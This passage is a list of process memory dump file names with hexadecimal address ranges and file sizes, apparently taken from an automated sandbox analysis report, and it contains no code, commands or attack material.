                                                                                                                                                                                          • memory/2676-392-0x00007FFED1F80000-0x00007FFED1F8F000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            60KB

                                                                                                                                                                                          • memory/2676-391-0x00007FFEC0D70000-0x00007FFEC0D93000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            140KB

                                                                                                                                                                                          • memory/2676-390-0x00007FFEC0DA0000-0x00007FFEC1389000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            5.9MB

                                                                                                                                                                                          • memory/2676-584-0x000001F768700000-0x000001F768A79000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3.5MB

                                                                                                                                                                                          • memory/2676-571-0x00007FFEC0360000-0x00007FFEC038E000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            184KB

                                                                                                                                                                                          • memory/2676-583-0x00007FFEC02A0000-0x00007FFEC0358000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            736KB

                                                                                                                                                                                          • memory/4740-89-0x00000219C6B60000-0x00000219C6B82000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            136KB

                                                                                                                                                                                          • memory/5540-521-0x000001FFA9990000-0x000001FFA9998000-memory.dmp

                                                                                                                                                                                            Filesize

                                                                                                                                                                                            32KB